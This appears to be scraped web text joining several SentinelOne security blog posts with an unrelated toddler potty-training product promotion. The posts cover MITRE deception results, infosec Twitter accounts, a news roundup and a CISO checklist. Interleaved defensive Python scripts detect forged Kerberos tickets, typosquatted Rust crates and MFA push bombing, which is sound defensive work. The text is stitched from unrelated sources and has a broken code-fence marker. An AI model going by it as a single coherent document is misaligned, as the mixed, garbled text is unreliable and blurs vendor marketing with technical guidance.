    SentinelOne prevented the red team from using the Golden Ticket even though Mimikatz had generated and loaded it successfully. SentinelOne detects forged Kerberos Golden and Silver tickets and prevents lateral movement and privilege escalation when the red team uses them.

  4. Maximize Security Insight Into the Adversary Behavior.
    SentinelOne’s deception technology not only serves to detect and respond to active attackers in a customer environment but also informs and strengthens security programs in the longer term. By misdirecting attacks with SentinelOne, defenders gain ingestible, actionable TTP information and high-confidence, substantiated attack forensics that support investigations and the development of threat intelligence. SentinelOne also lets you visualize attacks, see how they progressed over time, and map their associated events to the MITRE ATT&CK® and D3FEND™ matrices.
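Item 3 above describes what a Golden Ticket does but not how a defender without deception tooling would spot one. The following is an added example written for this page, not SentinelOne’s detection logic and not anything MITRE published: a hunting heuristic over Windows Security events 4768 (TGT requested) and 4769 (service ticket requested). A forged TGT is never issued by the KDC, so a 4769 for an account and client address with no recent 4768 is the classic tell; a service ticket using RC4-HMAC (encryption type 0x17) in a domain that issues AES is Mimikatz’s default and a second indicator. The event records are constructed, and the field names are assumptions about what a SIEM would extract from those events.

```python
"""Hunt for Golden Ticket indicators in Windows Security events.

Added example written for this page; it is not SentinelOne's detection logic.
The event records below are constructed, and the field names are assumptions
about what a SIEM would extract from events 4768 and 4769.
"""
from datetime import datetime, timedelta

TGT_REQUEST = 4768   # Security event: Kerberos authentication ticket (TGT) requested
TGS_REQUEST = 4769   # Security event: Kerberos service ticket (TGS) requested
RC4_HMAC = "0x17"    # ticket encryption type RC4-HMAC (AES256-CTS-HMAC-SHA1-96 is 0x12)

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 4768, "account": "svc_backup", "ip": "10.0.0.40", "ts": "2022-05-19T20:00:00Z", "enc": "0x12"},
    {"id": 4768, "account": "jdoe", "ip": "10.0.0.5", "ts": "2022-05-20T08:00:00Z", "enc": "0x12"},
    {"id": 4769, "account": "jdoe", "ip": "10.0.0.5", "ts": "2022-05-20T08:00:03Z",
     "service": "cifs/fs01", "enc": "0x12"},
    # No 4768 was ever seen for this account/host pair, and the ticket is RC4.
    {"id": 4769, "account": "Administrator", "ip": "10.0.0.77", "ts": "2022-05-20T08:15:00Z",
     "service": "cifs/dc01", "enc": "0x17"},
    # The only TGT for this pair is 13 hours old, beyond the default 10-hour lifetime.
    {"id": 4769, "account": "svc_backup", "ip": "10.0.0.40", "ts": "2022-05-20T09:00:00Z",
     "service": "ldap/dc01", "enc": "0x12"},
]


def _parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_golden_ticket_indicators(events, lookback=timedelta(hours=10), expect_aes=True):
    """Return one finding per 4769 that (a) has no 4768 for the same account and
    client address within `lookback`, or (b) uses RC4 although the domain is
    expected to issue AES tickets. (a) is the forged-TGT tell; (b) matches the
    Mimikatz default when no AES key is supplied."""
    last_tgt = {}  # (account, client ip) -> time of the most recent 4768
    findings = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        key = (e["account"].lower(), e["ip"])
        when = _parse_ts(e["ts"])
        if e["id"] == TGT_REQUEST:
            last_tgt[key] = when
            continue
        if e["id"] != TGS_REQUEST:
            continue
        reasons = []
        issued = last_tgt.get(key)
        if issued is None or when - issued > lookback:
            reasons.append("tgs_without_tgt")
        if expect_aes and e.get("enc") == RC4_HMAC:
            reasons.append("rc4_downgrade")
        if reasons:
            findings.append({"account": e["account"], "ip": e["ip"],
                             "service": e.get("service"), "ts": e["ts"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_golden_ticket_indicators(SAMPLE_EVENTS):
        print(f["ts"], f["account"], f["ip"], f["service"], ",".join(f["reasons"]))
```

Treat the output as hunting leads, not verdicts: a 4768 can be logged on a different domain controller than the matching 4769, so feed the function events from every DC, and tune `lookback` to the domain’s TGT lifetime and renewal policy (renewals are logged as 4770 and are not modelled here).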

Mapping to MITRE Engage Matrix

The MITRE Engage Matrix is a framework for planning and discussing adversary engagement operations that empower organizations to engage their adversaries and achieve their cybersecurity goals. MITRE Engage seeks to help defenders by lowering the barrier to entry while raising the ceiling of expertise to use adversary engagement technologies. SentinelOne provides the most extensive capabilities to implement the activities outlined in the Engage Matrix, covering 38 of the 41 areas in the Operations phase.

Why SentinelOne? Why Should It Matter To You?

Top Coverage for Both Enterprise ATT&CK + Deception ATT&CK Frameworks

As a leader across MITRE Enterprise ATT&CK Evaluations for the third consecutive year and a leader in the inaugural MITRE ATT&CK Deception Evaluation Trial, SentinelOne once again demonstrates its commitment to pushing the boundaries to help enterprises gain control of their dynamic attack surface.

As the first and only XDR vendor to participate in and lead the ATT&CK Deception Evaluation, SentinelOne demonstrates that the Singularity XDR platform is the most powerful autonomous XDR platform, reducing the enterprise attack surface across human, device, and cloud attack surfaces. The solution provides an effective combination of prevention, protection, detection, and deception capabilities to stop attackers early, whether they are attempting to establish a beachhead inside the network or compromising identity data to move laterally, escalate privileges, and acquire targets.

SentinelOne is an enthusiastic supporter of MITRE’s work in bringing transparent and open evaluation methodologies to the security industry, and participating in every evaluation has become an essential practice that we use to improve our products further.

To learn more about SentinelOne’s results on the ATT&CK® Deception Evaluations, visit https://www.sentinelone.com/lp/mitre-deception/

To learn more about SentinelOne’s results on the fourth round of ATT&CK® Enterprise Evaluations, visit: https://www.sentinelone.com/lp/mitre/.


22 Cybersecurity Twitter Accounts You Should Follow in 2022

As we navigate towards the midway-point of 2022, and despite current uncertainty over the company’s ownership, there is no doubt that Twitter remains cybersecurity’s favorite social media sharing platform. Whether you’re looking for the latest news on ransomware attacks and cybercrime, APTs and cyber war, digital forensics and incident response, malware outbreaks or reverse engineering, Twitter has it all and more.

Infosec is all about sharing knowledge, and on Twitter you’ll find our industry’s finest and brightest doing just that. So who should you be following in 2022 to stay up with current events, expand your knowledge and learn about new skills and resources? We’ve hand-picked 22 essential cybersecurity accounts for you to follow in 2022. While some you will find on our lists from previous years, there’s plenty of new, interesting and influential tweeters to discover on this year’s roster, too. Let’s check it out!

1. @KimZetter | Kim Zetter

Kim Zetter is a San Francisco-based journalist who has been writing about cybersecurity, national security and election security for over a decade. Author of a bestselling and authoritative book on Stuxnet, @KimZetter is an account where you will find the best in cybersecurity-related journalism.

2. @maddiestone | Maddie Stone

Reverse engineer and zero-day exploit expert, Maddie Stone works as a security researcher at Google Project Zero and is a regular con speaker. Her twitter account @maddiestone is essential for anyone wanting to keep up with the latest bugs and zero-day discoveries.

3. @cyb3rops | Florian Roth

Florian Roth is a detection engineer who is probably best known for his YARA rules, IOC collections and the THOR APT scanner. Florian also has a vast collection of free tools and detection utilities available on GitHub. Florian’s feed @cyb3rops contains an unmissable mix of original and curated content focusing on the latest threats and threat detection.

4. @campuscodi | Catalin Cimpanu

Catalin has featured on our list in the past, and even though he now describes himself as an “Ex-cybersecurity reporter” after having moved to work on newsletters for podcasting outlet RiskyBiz, his Twitter feed @campuscodi is still a goldmine of curated cybersecurity news and intel that’s not to be missed.

5. @cglyer | Christopher Glyer

Christopher is a Microsoft Threat Intelligence Center crimeware researcher, former incident responder and security architect. Follow @cglyer to stay on top of the latest malware outbreaks and developing news around ransomware and cybercrime.

6. @billyleonard | billy leonard

Billy Leonard is Global Head of Analysis of State Sponsored Hacking and Threats at Google Threat Analysis Group (TAG). While that sure is a lot of nouns, it all translates into a Twitter account worth following if you are interested in shares of IoCs and other valuable info pertaining to the latest threat actor activity.

7. @Kostastsale | Kostas

Speaking of detections, DFIRReport analyst @Kostastsale is a must-follow for anyone wanting to stay ahead of recent threat reports, detection tips and other DFIR-related news. Kostas also has a collection of useful repos on GitHub covering YARA rules, MITRE ATT&CK Navigator and threat intelligence playbooks.

8. @vxunderground | vx-underground

A relatively new infosec account on Twitter, vx-underground has quickly amassed a large following of cybersecurity professionals due to a combination of entertaining yet informative tweets with breaking news and access for researchers to the latest malware samples. Malware hunters, reverse engineers and detection engineers alike will find @vxunderground a valuable addition to their daily digest.

9. @likethecoins | Katie Nickels

Katie is Director of Intel at Red Canary, a SANS Certified Instructor for FOR578: Cyber Threat Intelligence, and Senior Fellow at the Atlantic Council’s Cyber Statecraft Initiative. Katie does great work promoting the work of others and is a great source of information for those making their way in the infosec industry. Follow her at @likethecoins.

10. @RidT | Thomas Rid

Professor of Strategic Studies and founding director of the Alperovitch Institute for Cybersecurity Studies at Johns Hopkins University’s School of Advanced International Studies, Thomas is one of the world’s foremost experts on politically motivated cyber attacks, disinformation and cybernetics. @RidT is an essential follow for all those interested in the juncture between cyber, politics and information.

11. @theJoshMeister | Josh Long

Josh Long has been on Twitter in the macOS/OSX security space longer than pretty much anyone else, and his following of almost 130K is testament to that. As a journalist specializing in cybersecurity issues relating to Apple, Mac and digital privacy, @theJoshMeister is a must-follow for all things related to security and the Cupertino giant.

12. @ryanaraine | Ryan Naraine

Another veteran of last year’s list, @ryanaraine remains an essential account to follow if you are interested in hackers and the business of cybersecurity. Ryan not only retweets the best of cybersecurity and infosec news from around the Twittersphere, he also offers thoughtful and insightful observations through regular podcasts.

13. @craiu | Costin Raiu

Costin Raiu is one of those infosec people from whom there is always something to learn, and if you’re not following @craiu yet, then now is the time to become one of his 37K followers! The self-described “antihacker from another planet” is director of Global Research and Analysis at Kaspersky and serves as a superb source of all things cybersecurity.

14. @AricToler | Aric Toler

Aric Toler is Director of Training & Research at Bellingcat, where he initially began as a volunteer way back in 2014. Bellingcat is a Netherlands-based investigative journalism charity specializing in OSINT, and Aric’s Twitter account is a great place to keep up with both his and their essential output.

15. @evacide | Eva Galperin

Eva Galperin is EFF‘s Director of Cybersecurity and co-founder of The Coalition Against Stalkerware. Always relevant and often humorous, @evacide is an infosec account not to be missed for all things related to digital privacy.

16. @4n6lady | Shannon Brazil

Shannon is Associate Director at Arete Incident Response and an OSINT enthusiast. Her Twitter feed is followed by 35,000 others for its engaging mix of personal and techy content with an emphasis on DFIR.

17. @zackwhittaker | Zack Whittaker

As security editor at TechCrunch and author of the popular this.weekinsecurity newsletter, Zack is one of the first sources to look to for breaking cyber and infosec news. @zackwhittaker’s feed is a fantastic way to keep up with everything that’s going on in the cyber world that could affect your organization, whether it’s in the U.S. or abroad.

18. @trufae | paπcake

OK, let’s talk about reverse engineering, starting off with the underrated but hugely capable radare2 software, developed and maintained by paπcake, whose feed is worth following not only for news and updates regarding r2 and @radareorg, but for reverse engineering in general.

19. @Fox0x01 | Maria Markstedter (Azeria)

ARM is becoming increasingly important for reverse engineers due to its overwhelming use in Linux, iOS and now Apple’s M1 Macs. One of the best resources on the net for knowledge around ARM is Azeria Labs, aka Maria Markstedter. @Fox0x01 is an expert in ARM-based systems and a thought leader in cybersecurity.

20. @HostileSpectrum | HostileSpectrum

Current events as they are, many of us in cybersecurity and elsewhere are taking a keen interest in the situation in Ukraine, how it’s developing, and what the wider lessons and ramifications might be. Follow @HostileSpectrum for great commentary on cyber war and the situation in Ukraine.

21. @GossiTheDog | Kevin Beaumont

Hugely popular and tells-it-like-it-is cybersecurity writer Kevin Beaumont says he keeps his employer’s identity secret to spare them the complaints from irate organizations. For the rest of us, @GossiTheDog is often the first to break news and always has insightful takes worth reading.

22. @juanandres_gs | J. A. Guerrero-Saade

Juan Andrés Guerrero-Saade, more popularly known as JAG-S, is Principal Threat Researcher at SentinelLabs. JAG-S’s Twitter feed is the first place to look for his unique insight into cyber war, espionage and nation-state threat actors, as well as relevant retweets and commentary on what’s happening at the forefront of cybersecurity research and intelligence.

Conclusion

The beauty of Twitter is its diversity and accessibility, and so naturally there’s far more out there than just these 22 accounts to keep you informed and engaged. Think we’ve missed someone essential? Ping us on Twitter and let us know (though you might find them on one of our earlier lists here, here and here). And of course, don’t forget to follow SentinelOne and SentinelLabs on Twitter, too, to keep up with the latest cybersecurity news and threat intelligence.

The Good, The Bad and the Ugly in Cybersecurity – Week 21

The Good

In the face of a cyber attack launched by the Hive ransomware group, the Bank of Zambia offered a particularly creative response to their attackers’ ransom note.

On May 13th, the Bank of Zambia released a public statement informing the public that they had been targeted by cyber criminals, and that the attack had caused “partial disruptions to some of its Information Technology (IT) applications on Monday, 9th May 2022.”

According to a recent report, the Hive ransomware group purportedly encrypted the Bank of Zambia’s Network Attached Storage (NAS) device. In response, representatives of the bank refused to pay the demanded ransom and chose to mock the hackers in their initial response.

The bank then linked a picture of male genitalia and told the attackers to “suck [it]” and “learn to monetize” because locking bank networks would be ineffective.

Although security experts assumed that unrelated parties had hijacked the negotiation chat, Greg Nsofu, Technical Director at the Bank of Zambia, tacitly confirmed that this was not the case.

Once the bank confirmed that its core systems were protected from the attack, Nsofu stated that the bank’s response “pretty much told them where to get off.”

Although this was an unorthodox response to threat actors, the Bank of Zambia’s proactive steps to protect their core systems and clear refusal to pay the ransom are exemplary of how organizations should prepare and respond to ransomware attacks.

The Bad

On May 19th, 2022, SentinelLabs shared their initial findings on a supply-chain attack against the Rust programming language development community, referred to as CrateDepression.

In an advisory published on May 10th, the Rust Security Response Working Group disclosed the discovery and removal of a malicious crate from the crates.io community repository.

Security experts found that the threat actors attempted to impersonate a trusted Rust developer and uploaded malware to the Rust dependency community repository. The attacker(s) named their malicious crate “rustdecimal” in an attempt to typosquat and fool Rust developers looking to use the well-known rust_decimal crate.

Once the malicious crate infects a machine, the machine is scanned for the “GITLAB_CI” environment variable to identify GitLab Continuous Integration (CI) pipelines for software development. Infected CI pipelines are used to deliver a second-stage payload. The SentinelLabs team has identified these payloads as Go binaries built on the Mythic agent “Poseidon,” a red-teaming framework.

Although the responsible threat actors’ intent is currently unknown, the nature of their targets indicates that this attack could enable subsequent, larger-scale supply-chain attacks through the development pipelines it infected.

The Rust security team’s advisory recommends that organizations and projects running GitLab CI pipelines check whether they depended on the rustdecimal crate, starting from March 25th, 2022. If a dependency on that crate is detected, the CI environment may be compromised. The advisory also recommends regular dependency audits and exclusively using crates from trusted authors.
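The advisory’s check is a dependency audit. As an added example written for this page (not the Rust Security Response Working Group’s tooling and not SentinelLabs’ code), the script below parses a Cargo.lock, flags the crate named in the advisory, and goes one step further: it reports any registry crate whose name collapses to a trusted crate’s name once `-` and `_` are dropped, or sits within a small edit distance of one, which is the general typosquat pattern this crate relied on. The allowlist, the Cargo.lock text and the `reqwst` entry are constructed; `rustdecimal` and `rust_decimal` are the names from the advisory.

```python
"""Audit a Cargo.lock for the CrateDepression crate and for typosquats of trusted crates.

Added example written for this page; it is not the Rust Security Response WG's
tooling or SentinelLabs' code. The allowlist and the Cargo.lock text are constructed.
"""
import os
import re
from difflib import SequenceMatcher

KNOWN_MALICIOUS = {"rustdecimal"}                          # the crate named in the advisory
TRUSTED = {"rust_decimal", "serde", "tokio", "reqwest"}    # constructed allowlist

PACKAGE_SPLIT = re.compile(r"^\[\[package\]\]\s*$", re.M)
FIELD = re.compile(r'^(\w+)\s*=\s*"([^"]*)"', re.M)

# Constructed Cargo.lock. "reqwst" is a hypothetical typosquat of reqwest added to
# exercise the near-match rule; it is not a crate named on this page.
SAMPLE_LOCK = """\
# This file is automatically @generated by Cargo.
version = 3

[[package]]
name = "my-service"
version = "0.1.0"
dependencies = [
 "reqwst",
 "rustdecimal",
 "serde",
]

[[package]]
name = "reqwst"
version = "0.11.0"
source = "registry+https://github.com/rust-lang/crates.io-index"

[[package]]
name = "rustdecimal"
version = "1.23.1"
source = "registry+https://github.com/rust-lang/crates.io-index"

[[package]]
name = "serde"
version = "1.0.137"
source = "registry+https://github.com/rust-lang/crates.io-index"
"""


def parse_cargo_lock(text):
    """Return [(name, version, source)] for every [[package]] table.
    Workspace members have no `source`; registry downloads do."""
    packages = []
    for chunk in PACKAGE_SPLIT.split(text)[1:]:
        fields = dict(FIELD.findall(chunk))
        packages.append((fields.get("name", ""), fields.get("version", ""), fields.get("source", "")))
    return packages


def normalize(name):
    """crates.io treats '-' and '_' as equivalent, so compare without them."""
    return name.lower().replace("-", "").replace("_", "")


def audit(lock_text, trusted=TRUSTED, malicious=KNOWN_MALICIOUS, threshold=0.85):
    """Return {"malicious": [(name, version)], "suspicious": [(name, version, looks_like)]}."""
    report = {"malicious": [], "suspicious": []}
    trusted_norm = {normalize(t): t for t in trusted}
    for name, version, source in parse_cargo_lock(lock_text):
        if not source or name in trusted:
            continue  # local workspace crate, or exactly what we expect
        if name in malicious:
            report["malicious"].append((name, version))
            continue
        if normalize(name) in trusted_norm:   # same letters, different spelling
            report["suspicious"].append((name, version, trusted_norm[normalize(name)]))
            continue
        closest = max(trusted, key=lambda t: SequenceMatcher(None, name, t).ratio())
        if SequenceMatcher(None, name, closest).ratio() >= threshold:
            report["suspicious"].append((name, version, closest))
    return report


def in_gitlab_ci():
    """The second-stage payload keyed on this variable, so a hit while it is set
    means the CI environment itself should be treated as compromised."""
    return "GITLAB_CI" in os.environ


if __name__ == "__main__":
    result = audit(SAMPLE_LOCK)
    for name, version in result["malicious"]:
        print(f"MALICIOUS  {name} {version}" + ("  (running under GitLab CI!)" if in_gitlab_ci() else ""))
    for name, version, looks_like in result["suspicious"]:
        print(f"SUSPICIOUS {name} {version}  resembles trusted crate {looks_like}")
```

Keep the allowlist to crates the project intentionally depends on; anything that merely resembles one of them deserves a look at its author and publication history on crates.io before it is allowed to stay in the lock file.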

The SentinelLabs team has also assembled several Indicators of Compromise (IOCs) to assist security teams with proactive threat hunting, detection and response, which you can access here.

The Ugly

In the latest news surrounding international cyber attacks, an emerging Chinese threat group (dubbed “Space Pirates” by Russian threat analysts) is targeting Russian aerospace firms with phishing emails.

Analysts have determined that phishing emails sent to Russian, Mongolian and Georgian government-affiliated and private organizations in the aerospace, electric power and IT industries were designed to install custom malware and exfiltrate sensitive data from infected environments.

The Space Pirates were first observed while security professionals were responding to an incident in the summer of 2021, but analysts theorize that the group may have been active since at least 2019. A recent report found that the Space Pirates’ malware and infrastructure had been sighted in similar attacks, including two successful campaigns against state-sponsored Russian organizations.

During these attacks, the group was able to maintain access to servers and networks for extended periods of time, ranging from ten months up to over a year, stealing confidential documents, employee data and other critical information.

According to the findings, the cluster of activity attributed to the Space Pirates APT is just the latest in a rising trend of escalating attacks from Chinese threat actors against Russian entities. The threat group deploys signature Chinese malware such as ShadowPad and PlugX among a complex range of modular malware tools, custom loaders, and modified backdoors.

Chinese threat actors are also known to leverage tool exchanges and share tools to make it harder to identify specific threat groups, posing a difficult and taxing challenge for security professionals looking to identify threats and protect their systems. For organizations without modern defenses, these APTs and their malware continue to pose a serious risk.

How to Stay Ahead of the Adversary in 2022 | A Cybersecurity Checklist

Rarely a week passes by without news of another company being breached, a ransomware attack crippling critical infrastructure, or a data loss event causing millions to suffer a loss of privacy. On the other hand, these same organizations are trying as hard as they can to safeguard their customers, their data and their reputations. So what is missing? Is it a gap in technology? Is it about strengthening policies and procedures? Is it simply “the cost of doing business” – an inevitable outcome of the way we work and trade today?

In this post, I will share a few of the main reasons why we are where we are, and provide some simple steps for enterprises to take to change this paradigm.

Top 5 Trends That Increase Cyber Security Risk in 2022

There are a vast number of threats and threat actors out there, and their numbers are only growing. This expansion reflects a number of major technological shifts in recent years that have contributed to the changing threat landscape.

1. Increasing Discovery of Software Vulnerabilities

Vulnerability hunting has hit the big-time in recent years, thanks in large part to the popularity of bug bounty programs and “hacker” platforms that reward researchers and share knowledge. This is not only a good thing, it’s undoubtedly a necessary thing.

However, the flipside of better vulnerability reporting is faster time to exploitation, as threat actors rapidly jump on research publications and look for victims that have failed or are unable to patch. Exploited vulnerabilities can cause serious damage to all organizations, including those running our critical infrastructure.

Phasing out unpatchable technology and obtaining visibility across the entire digital estate are imperatives. Until then, the net result is that the bar for breaching unwary organizations will keep getting lower.

2. The Hybrid Nature of Today’s Networks

Users and identity represent the new cybersecurity frontier as the world of work moves away from the office to remote or location-independent work. As long as users are connected, they remain part of your network, whether they are in the next office or on the other side of the world.

The new reality of a distributed workforce increases the risk to enterprises as attackers shift to targeting end users and endpoints by compromising credentials and authentication methods at any point along the entire supply chain.

Take, for example, the recent highly-publicized activities of the Lapsus$ hacker group, which among other things compromised Okta’s systems by gaining remote access to a machine belonging to an employee of Sitel, a company subcontracted to provide customer service functions for Okta.

3. The Migration to the Cloud

The new kids on the block are your cloud assets. While businesses grow rapidly by scaling up their offering with the cloud, that growth makes it harder for security teams and defenses to stay on top of the risk. The security implications of AWS, Azure or other cloud assets are difficult to grasp for many businesses, even those with large SOCs.

From cloud misconfigurations to compromise through vulnerable services (think Log4j), protecting cloud workloads can be a challenging task, particularly when they are spread over public clouds, private clouds and on-prem data centers.

4. Increasing Attacks on IoT Devices

‘Smart devices’ that are connected to the internet have increased the attack surface for organizations. From networked printers to security cameras, anything connected to the public internet can serve as a backdoor into your organization.

Increased risk caused by IoT devices includes unchanged default passwords, outdated firmware with known exploitable vulnerabilities, and the lack of network discovery for many IT and security teams. As threat actors scan networks with automated tools for any sign of weakness, administrators similarly need automated tools that can identify and protect any device as it is plugged into the network.

The increasing use of unprotected or insecure Smart devices has given attackers an easy way into networks, a beachhead from which they launch attacks to steal information or commit fraud through ransomware or other techniques.

5. Increase in BYOD and Mobile Authentication

While the use of mobile devices in the workplace has been with us for a number of years now, mobiles and mobile authentication are still creating new opportunities for malicious actors to steal valuable data.

Mobile authentication, or the verification of a user’s identity through a mobile device and one or more authentication methods to ensure secure access, has opened a new stream of attacks, using recycled phone numbers and other new attack vectors. Recent examples include attackers using social engineering against users suffering from so-called “MFA fatigue”: the attacker, already holding the user’s password, triggers push notification after push notification until the user approves one, thereby authenticating the attacker’s login attempt.
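Push-notification bombardment leaves a distinctive trace in authentication logs. The following is an added example written for this page, not any identity provider’s detection: it reads constructed push-authentication records (timestamp, user, method, result, source address) and raises an alert either when a user rejects or ignores several prompts in a short window and then approves one, or when the prompts keep coming regardless of outcome. The log format, the thresholds and the sample lines are all assumptions.

```python
"""Flag MFA-fatigue (push bombing) patterns in authentication logs.

Added example written for this page, not any vendor's detection. The log format
(timestamp,user,method,result,source_ip), the thresholds and the sample lines
are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. alice approves after four rejected prompts in three
# minutes; erin is bombarded and never approves; carol and bob are normal use.
SAMPLE_LOG = """\
2022-05-20T08:01:05Z,alice,push,denied,203.0.113.10
2022-05-20T08:01:40Z,alice,push,denied,203.0.113.10
2022-05-20T08:02:15Z,alice,push,timeout,203.0.113.10
2022-05-20T08:02:50Z,alice,push,denied,203.0.113.10
2022-05-20T08:03:30Z,alice,push,approved,203.0.113.10
2022-05-20T09:10:00Z,bob,push,approved,198.51.100.7
2022-05-20T11:00:00Z,carol,push,denied,192.0.2.5
2022-05-20T14:00:00Z,carol,push,approved,192.0.2.5
2022-05-20T15:00:00Z,dave,totp,approved,192.0.2.9
2022-05-20T16:00:00Z,erin,push,denied,203.0.113.44
2022-05-20T16:00:30Z,erin,push,timeout,203.0.113.44
2022-05-20T16:01:00Z,erin,push,denied,203.0.113.44
2022-05-20T16:01:30Z,erin,push,denied,203.0.113.44
2022-05-20T16:02:00Z,erin,push,denied,203.0.113.44
"""

REJECTED = {"denied", "timeout"}


def parse_line(line):
    ts, user, method, result, src = line.strip().split(",")
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "user": user,
            "method": method, "result": result, "src": src}


def detect_mfa_fatigue(log_text, window=timedelta(minutes=10),
                       min_rejections=3, max_prompts=5):
    """Two rules over push prompts per user, evaluated in time order:
    - approved_after_rejections: >= min_rejections rejected/ignored prompts
      inside `window`, followed by an approval (the attack succeeding);
    - bombardment: >= max_prompts rejected/ignored prompts inside `window`
      (the attack in progress, whether or not it later succeeds)."""
    by_user = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            e = parse_line(line)
            if e["method"] == "push":
                by_user[e["user"]].append(e)

    alerts = []
    for user, events in by_user.items():
        pending = []  # rejected prompts still inside the sliding window
        for e in sorted(events, key=lambda ev: ev["ts"]):
            pending = [p for p in pending if e["ts"] - p["ts"] <= window]
            if e["result"] in REJECTED:
                pending.append(e)
                if len(pending) >= max_prompts:
                    alerts.append({"user": user, "kind": "bombardment",
                                   "rejected": len(pending), "first_prompt": pending[0]["ts"],
                                   "last_prompt": e["ts"], "source": e["src"]})
                    pending = []
            elif e["result"] == "approved" and len(pending) >= min_rejections:
                alerts.append({"user": user, "kind": "approved_after_rejections",
                               "rejected": len(pending), "first_prompt": pending[0]["ts"],
                               "approved_at": e["ts"], "source": e["src"]})
                pending = []
    return alerts


if __name__ == "__main__":
    for a in detect_mfa_fatigue(SAMPLE_LOG):
        print(a["user"], a["kind"], a["rejected"], "prompts from", a["source"])
</ ```

The approval-after-rejections rule is the one worth paging someone for, since it means the attacker already holds a valid password and has just obtained a session; the bombardment rule is the earlier warning, and a good trigger for locking the account and resetting the password before the user gives in.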

The Threat Landscape is Booming

The bar for compromising enterprise assets is lower than ever before, and there are a few reasons for that. As one of the main operating system vendors, Microsoft plays a significant role in this area. There are too many ways attackers can use vulnerabilities to break into and exfiltrate data from secured networks; recent examples include ProxyLogon, exploited by the Hafnium group, and many others. There are growing voices in our industry criticizing the way Microsoft handles researcher vulnerability reporting, including some very vocal discussions. Other OS vendors should also improve the way they respond to vulnerabilities, and work more closely with security vendors to make their products better.

Key Takeaways – A CISO’s Cybersecurity Checklist

  • Eat Your Vegetables – Always stay ahead of best practices, ensuring you kill off any “low-hanging fruit” attack vectors. This includes enforcing multi-factor authentication and deploying endpoint protection on every computer, cloud workload or mobile device. Use your budget and create teams who live and breathe securing your organization. Know your adversaries. Simulate attacks and confirm that you are ready for the day of a breach. Create backups. There are no shortcuts here.
  • Create a Coalition – Cybersecurity is not a challenge only for the CISO: It’s a priority for the company. This means the CEO, the board of directors and other senior stakeholders should be aware of the risks and consider them against the priorities of the business.

    In 2022, there is no business without security. The CISO needs to ensure that all these stakeholders are aware of that and that they understand securing the enterprise does not happen in a silo. Share news, simulate breach responses, raise awareness. A breach can be caused by malicious actors or happen accidentally, but either way, it can cost companies millions in damages, lost revenue and reputational harm.
  • Stay Informed, and Increase Awareness of End Users – Follow the news and share with your users. While some headlines can inevitably be overblown, they can also be motivating, and there’s nothing exaggerated about the cost of ransomware, BEC, fraud and other cybercrimes to businesses today. Keep your people in the know regarding cybersecurity risks by encouraging them to be aware and interested in cyberspace. If the topic is good enough for mainstream television, we can make it good enough for our users also.
  • Get an Outsider’s Perspective – If you can run an in-house red team, that’s great. If you cannot, engage an external one for periodic red team exercises to ensure there are no blind spots within your organization. If you are developing software or providing software as a service, run a bug bounty program and ensure “friendly eyes” are discovering your vulnerabilities before attackers do.
  • Know Your Enterprise Assets – How well do you know the security implications of your AWS, Azure or other cloud assets? What are the security implications of running Docker and Kubernetes? Cloud-focused attacks are a rapidly growing area of interest to opportunistic and targeted attackers alike.

    While the techniques used in such attacks are vast and varied, they typically rely heavily on the fact that cloud networks are large, complex, and onerous to manage. This makes agent-based and container security solutions critical for the defense of any organization across all cloud platforms. Look for and deploy security solutions that make this complexity simple.
  • Remember Supply Chain Attacks – Be in the know to reduce the risk of supply chain attacks. Although it is difficult for any security team to monitor and approve every business application entering the enterprise, visibility into every device can provide good insight into applications that may be more vulnerable than your end users believe.

    The previous year in cybersecurity showed us all how easy it is for adversaries to compromise widely-used applications. The SolarWinds and Kaseya compromises were unfortunate but timely reminders that software dependencies are a massive blindspot. When organizations rely on shared modules, plug-ins, and packages from open-source or non-security focused developers, the chance of such components being secure out-of-the-box is low.

    Attackers tend to seek the easy way in, and compromising a relatively weak application that is used by many is all an attacker needs. Technology can help to maximize visibility across the entire cyber estate.

Conclusion

There are no magic bullets, and cybersecurity remains a challenge that requires focus, knowledge and the right solutions that fit your business needs. SentinelOne is here to help CISOs with the challenge of securing the enterprise. To learn more about how to defend and protect your organization from today’s adversaries, contact us for more information or request a free demo.


Super Potty Trainer – A Shark Tank Product For Toddlers Which Takes The Internet By Storm!

Super Potty Trainer is the newest and most innovative potty training product on the market. It was recently featured on Shark Tank and has taken the Internet by storm! This unique product makes potty training easier and more fun for both parents and toddlers.

The Super Potty Trainer features a patented design that allows toddlers to sit on the regular toilet seat, giving them extra back support and making it more comfortable. This simple idea has made potty training more efficient and less messy for parents and less stressful, and more fun for toddlers!

The history behind the Super Potty Trainer that makes it so special

Super Potty Trainer was created by a mom – Judy Abrahams – who was potty training her own toddler. She saw how difficult and stressful it was for both parents and toddlers: her child was afraid of falling in, and she constantly had to clean up accidents. To make things worse, Judy’s daughter was so stressed out that she would become constipated!

Judy realized that there had to be a better way to potty train and set out to find it. After months of research and development, she created the Super Potty Trainer: a potty training seat that gives toddlers the extra back support they need, making it more comfortable and less stressful for them.

The product was an instant success with parents and toddlers alike and quickly became a must-have for any family potty training their child. It has even been featured on Shark Tank, where it received rave reviews from the sharks!

The Internet is abuzz with Super Potty Trainer reviews, and it is quickly becoming the go-to product for potty training. If you are looking for a potty training solution that is effective and fun, look no further than Super Potty Trainer!

How does the Super Potty Trainer work?

The Super Potty Trainer is a potty training system that helps toddlers transition from diapers to the toilet. The way this innovative product works is simple; it attaches to the regular toilet and provides extra back support for toddlers. This back support makes it more comfortable for toddlers to sit on the toilet and helps prevent them from making a mess.

See how it works – it is easy as 1-2-3!

  1. Lift the toilet seat. Place the Super Potty Trainer on a clean, dry toilet rim.
  2. Lower the seat to keep it in place.
  3. Your toddler is ready to start potty training!

The Super Potty Trainer allows you to adjust the depth of your toilet seat so it is always a comfortable fit for your toddler: simply move Super Potty Trainer forward or backward on the toilet to suit your child’s preferences.

This product is also easy to clean and is made from durable, high-quality materials.

Will Super Potty Trainer fit my toilet?

The Super Potty Trainer is designed to fit most toilets. There is an easy way to check if your toilet is compatible with the product. All you need to do is check if there is a little gap between the toilet seat and the rim of your toilet. If there is a gap, your toilet is compatible with the Super Potty Trainer.

